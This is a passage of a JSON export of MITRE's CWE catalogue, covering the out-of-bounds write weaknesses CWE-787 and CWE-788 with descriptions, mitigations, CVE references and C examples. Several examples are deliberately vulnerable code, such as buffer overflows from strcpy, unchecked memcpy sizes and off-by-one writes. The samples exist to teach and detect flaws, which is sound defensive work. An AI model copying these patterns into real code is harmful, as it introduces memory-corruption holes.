underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024"},{"Reference":"CVE-2004-2620","Description":"Buffer underflow due to mishandled special characters","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Specific"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"787":{"attr":{"@_ID":"787","@_Name":"Out-of-bounds Write","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software writes data past the end, or before the beginning, of the intended buffer.","Extended_Description":"Typically, this can result in corruption of data, a crash, or code execution. The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. A subsequent write operation then produces undefined or unexpected results.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Memory Corruption","Description":"The generic term \\"memory corruption\\" is often used to describe the consequences of writing to memory outside the bounds of a buffer, or to memory that is invalid, when the root cause is something other than a sequential copy of excessive data from a fixed starting location. This may include issues such as incorrect pointer arithmetic, accessing invalid pointers due to incomplete initialization or memory release, etc."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code attempts to save four different identification numbers into an array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int id_sequence[3];/* Populate the id array. */id_sequence[0] = 123;id_sequence[1] = 234;id_sequence[2] = 345;id_sequence[3] = 456;","xhtml:br":["","","","","","",""]}},"Body_Text":"Since the array is only allocated to hold three elements, the valid indices are 0 to 2; so, the assignment to id_sequence[3] is out of bounds."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&\' == user_supplied_string[i] ){}else if (\'<\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index < length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i<numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-0022","Description":"chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"},{"Reference":"CVE-2009-1532","Description":"malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532"},{"Reference":"CVE-2009-0269","Description":"chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269"},{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Stack Overruns" Page 129"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Heap Overruns" Page 138"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Nonexecutable Stack", Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, "Protection Mechanisms", Page 189"}},{"attr":{"@_External_Reference_ID":"REF-90"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"}]}},"788":{"attr":{"@_ID":"788","@_Name":"Access of Memory Location After End of Buffer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer; when pointer arithmetic results in a position before the buffer; or when a negative index is used, which generates a position before the buffer.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&\' == user_supplied_string[i] ){}else if (\'<\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) > 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer > BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index < msg->msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg->msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"},{"Reference":"CVE-2009-0689","Description":"large precision value in a format string triggers overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689"},{"Reference":"CVE-2009-0558","Description":"attacker-controlled array index leads to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"},{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-788"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-788"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 